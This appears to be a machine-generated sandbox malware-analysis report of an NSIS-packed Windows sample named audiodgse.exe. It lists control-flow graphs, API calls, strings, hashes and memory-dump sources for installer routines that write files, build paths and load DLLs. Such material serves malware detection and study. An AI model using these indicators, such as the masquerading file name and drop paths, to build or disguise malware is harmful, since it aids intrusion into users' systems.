                                                  • String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Trochidae Setup: Installing$_Nb
                                                  • API String ID: 1975747703-612763135
                                                  • Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                  • Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
                                                  • Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                  • Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b73 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fda call 4059b9 call 405fda GetFileSize 364->368 369 402ff4-402ff8 367->369 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 384 402f47-402f4a 377->384 385 402f9a-402f9f 377->385 380 402e70 379->380 381 402e72-402e7b call 4031d7 379->381 380->381 390 402fa1-402fa9 call 402d60 381->390 391 402e81-402e88 381->391 387 402f4c-402f64 call 4031ed call 4031d7 384->387 388 402f6e-402f98 GlobalAlloc call 4031ed call 402ffb 384->388 385->369 387->385 410 402f66-402f6c 387->410 388->385 415 402fab-402fbc 388->415 390->385 394 402f04-402f08 391->394 395 402e8a-402e9e call 405b2e 391->395 399 402f12-402f18 394->399 400 402f0a-402f11 call 402d60 394->400 395->399 413 402ea0-402ea7 395->413 406 402f27-402f2f 399->406 407 402f1a-402f24 call 406429 399->407 400->399 406->379 414 402f35 406->414 407->406 410->385 410->388 413->399 417 402ea9-402eb0 413->417 414->377 418 402fc4-402fc9 415->418 419 402fbe 415->419 417->399 421 402eb2-402eb9 417->421 420 402fca-402fd0 418->420 419->418 420->420 422 402fd2-402fed SetFilePointer call 405b2e 420->422 421->399 423 402ebb-402ec2 421->423 426 402ff2 422->426 423->399 425 402ec4-402ee4 423->425 425->385 427 402eea-402eee 425->427 426->369 428 402ef0-402ef4 427->428 429 402ef6-402efe 427->429 428->414 428->429 429->399 430 402f00-402f02 429->430 430->399
                                                  APIs
                                                  • GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402DD5
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\audiodgse.exe,00000400), ref: 00402DF1
                                                    • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00405B77
                                                    • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\audiodgse.exe,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 00402E3D
                                                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming, xrefs: 00402E1F, 00402E24, 00402E2A
                                                  • "C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 00402DC4
                                                  • Inst, xrefs: 00402EA9
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
                                                  • C:\Users\user\AppData\Roaming\audiodgse.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
                                                  • Null, xrefs: 00402EBB
                                                  • soft, xrefs: 00402EB2
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                  • Error launching installer, xrefs: 00402E14
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\audiodgse.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-1888111785
                                                  • Opcode ID: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                  • Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
                                                  • Opcode Fuzzy Hash: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                  • Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 431 405ffc-406007 432 406009-406018 431->432 433 40601a-406030 431->433 432->433 434 406221-406225 433->434 435 406036-406041 433->435 437 406053-40605d 434->437 438 40622b-406235 434->438 435->434 436 406047-40604e 435->436 436->434 437->438 439 406063-40606a 437->439 440 406240-406241 438->440 441 406237-40623b call 405fda 438->441 443 406070-4060a4 439->443 444 406214 439->444 441->440 445 4061c1-4061c4 443->445 446 4060aa-4060b4 443->446 447 406216-40621c 444->447 448 40621e-406220 444->448 451 4061f4-4061f7 445->451 452 4061c6-4061c9 445->452 449 4060b6-4060ba 446->449 450 4060ce 446->450 447->434 448->434 449->450 456 4060bc-4060c0 449->456 453 4060d5-4060dc 450->453 454 406205-406212 lstrlenA 451->454 455 4061f9-406200 call 405ffc 451->455 457 4061d9-4061e5 call 405fda 452->457 458 4061cb-4061d7 call 405f38 452->458 460 4060e1-4060e3 453->460 461 4060de-4060e0 453->461 454->434 455->454 456->450 464 4060c2-4060c6 456->464 468 4061ea-4061f0 457->468 458->468 466 4060e5-406100 call 405ec1 460->466 467 40611c-40611f 460->467 461->460 464->450 469 4060c8-4060cc 464->469 474 406105-406108 466->474 472 406121-40612d GetSystemDirectoryA 467->472 473 40612f-406132 467->473 468->454 471 4061f2 468->471 469->453 475 4061b9-4061bf call 406244 471->475 476 4061a3-4061a6 472->476 477 406134-406142 GetWindowsDirectoryA 473->477 478 40619f-4061a1 473->478 479 4061a8-4061ac 474->479 480 40610e-406117 call 405ffc 474->480 475->454 476->475 476->479 477->478 478->476 481 406144-40614e 478->481 479->475 484 4061ae-4061b4 lstrcatA 479->484 480->476 486 406150-406153 481->486 487 406168-40617e SHGetSpecialFolderLocation 481->487 484->475 486->487 488 406155-40615c 486->488 489 406180-40619a SHGetPathFromIDListA CoTaskMemFree 487->489 490 40619c 487->490 492 406164-406166 488->492 489->476 489->490 490->478 492->476 492->487
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406127
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000), ref: 0040613A
                                                  • SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?), ref: 00406176
                                                  • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00406190
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
                                                  • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$jl-
                                                  • API String ID: 717251189-2131593371
                                                  • Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                  • Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
                                                  • Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                  • Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 783 401759-40177c call 402b2c call 4059df 788 401786-401798 call 405fda call 405972 lstrcatA 783->788 789 40177e-401784 call 405fda 783->789 795 40179d-4017a3 call 406244 788->795 789->795 799 4017a8-4017ac 795->799 800 4017ae-4017b8 call 4062dd 799->800 801 4017df-4017e2 799->801 809 4017ca-4017dc 800->809 810 4017ba-4017c8 CompareFileTime 800->810 803 4017e4-4017e5 call 405b4e 801->803 804 4017ea-401806 call 405b73 801->804 803->804 811 401808-40180b 804->811 812 40187e-4018a7 call 405101 call 402ffb 804->812 809->801 810->809 813 401860-40186a call 405101 811->813 814 40180d-40184f call 405fda * 2 call 405ffc call 405fda call 4056f6 811->814 826 4018a9-4018ad 812->826 827 4018af-4018bb SetFileTime 812->827 824 401873-401879 813->824 814->799 848 401855-401856 814->848 828 4029c1 824->828 826->827 830 4018c1-4018cc CloseHandle 826->830 827->830 831 4029c3-4029c7 828->831 833 4018d2-4018d5 830->833 834 4029b8-4029bb 830->834 836 4018d7-4018e8 call 405ffc lstrcatA 833->836 837 4018ea-4018ed call 405ffc 833->837 834->828 842 4018f2-402349 836->842 837->842 846 40234e-402353 842->846 847 402349 call 4056f6 842->847 846->831 847->846 848->824 849 401858-401859 848->849 849->813
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7
                                                    • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                    • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                    • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                    • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll), ref: 0040516F
                                                    • Part of subcall function 00405101: SendMessageA.USER32 ref: 00405195
                                                    • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051AF
                                                    • Part of subcall function 00405101: SendMessageA.USER32 ref: 004051BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp$C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$Call
                                                  • API String ID: 1941528284-1874122519
                                                  • Opcode ID: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                  • Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
                                                  • Opcode Fuzzy Hash: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                  • Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 850 405101-405116 851 4051cc-4051d0 850->851 852 40511c-40512e 850->852 853 405130-405134 call 405ffc 852->853 854 405139-405145 lstrlenA 852->854 853->854 856 405162-405166 854->856 857 405147-405157 lstrlenA 854->857 859 405175-405179 856->859 860 405168-40516f SetWindowTextA 856->860 857->851 858 405159-40515d lstrcatA 857->858 858->856 861 40517b-4051bd SendMessageA * 3 859->861 862 4051bf-4051c1 859->862 860->859 861->862 862->851 863 4051c3-4051c6 862->863 863->851
                                                  APIs
                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                  • lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll), ref: 0040516F
                                                  • SendMessageA.USER32 ref: 00405195
                                                  • SendMessageA.USER32 ref: 004051AF
                                                  • SendMessageA.USER32 ref: 004051BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp\System.dll
                                                  • API String ID: 2531174081-1622199015
                                                  • Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                  • Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
                                                  • Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                  • Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 864 4055c7-405612 CreateDirectoryA 865 405614-405616 864->865 866 405618-405625 GetLastError 864->866 867 40563f-405641 865->867 866->867 868 405627-40563b SetFileSecurityA 866->868 868->865 869 40563d GetLastError 868->869 869->867
                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                  • GetLastError.KERNEL32 ref: 0040561E
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
                                                  • GetLastError.KERNEL32 ref: 0040563D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$ls@$|s@
                                                  • API String ID: 3449924974-627287411
                                                  • Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                  • Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
                                                  • Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                  • Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 870 406304-406324 GetSystemDirectoryA 871 406326 870->871 872 406328-40632a 870->872 871->872 873 40633a-40633c 872->873 874 40632c-406334 872->874 876 40633d-40636f wsprintfA LoadLibraryExA 873->876 874->873 875 406336-406338 874->875 875->876
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                  • wsprintfA.USER32 ref: 00406354
                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406368
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%s.dll$UXTHEME$\
                                                  • API String ID: 2200240437-4240819195
                                                  • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                  • Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
                                                  • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                  • Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 877 402ffb-40300f 878 403011 877->878 879 403018-403020 877->879 878->879 880 403022 879->880 881 403027-40302c 879->881 880->881 882 40303c-403049 call 4031d7 881->882 883 40302e-403037 call 4031ed 881->883 887 40318e 882->887 888 40304f-403053 882->888 883->882 889 403190-403191 887->889 890 403177-403179 888->890 891 403059-403079 GetTickCount call 406497 888->891 892 4031d0-4031d4 889->892 893 4031c2-4031c6 890->893 894 40317b-40317e 890->894 901 4031cd 891->901 902 40307f-403087 891->902 897 403193-403199 893->897 898 4031c8 893->898 899 403180 894->899 900 403183-40318c call 4031d7 894->900 904 40319b 897->904 905 40319e-4031ac call 4031d7 897->905 898->901 899->900 900->887 910 4031ca 900->910 901->892 906 403089 902->906 907 40308c-40309a call 4031d7 902->907 904->905 905->887 914 4031ae-4031ba call 405c1a 905->914 906->907 907->887 915 4030a0-4030a9 907->915 910->901 920 403173-403175 914->920 921 4031bc-4031bf 914->921 917 4030af-4030cc call 4064b7 915->917 923 4030d2-4030e9 GetTickCount 917->923 924 40316f-403171 917->924 920->889 921->893 925 4030eb-4030f3 923->925 926 40312e-403130 923->926 924->889 929 4030f5-4030f9 925->929 930 4030fb-403126 MulDiv wsprintfA call 405101 925->930 927 403132-403136 926->927 928 403163-403167 926->928 931 403138-40313d call 405c1a 927->931 932 40314b-403151 927->932 928->902 933 40316d 928->933 929->926 929->930 937 40312b 930->937 938 403142-403144 931->938 936 403157-40315b 932->936 933->901 936->917 939 403161 936->939 937->926 938->920 940 403146-403149 938->940 939->901 940->936
                                                  APIs
                                                  • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403059
                                                  • GetTickCount.KERNEL32(004128C0,00004000), ref: 004030DA
                                                  • MulDiv.KERNEL32 ref: 00403107
                                                  • wsprintfA.USER32 ref: 00403117
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 551687249-2449383134
                                                  • Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                  • Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
                                                  • Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                  • Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
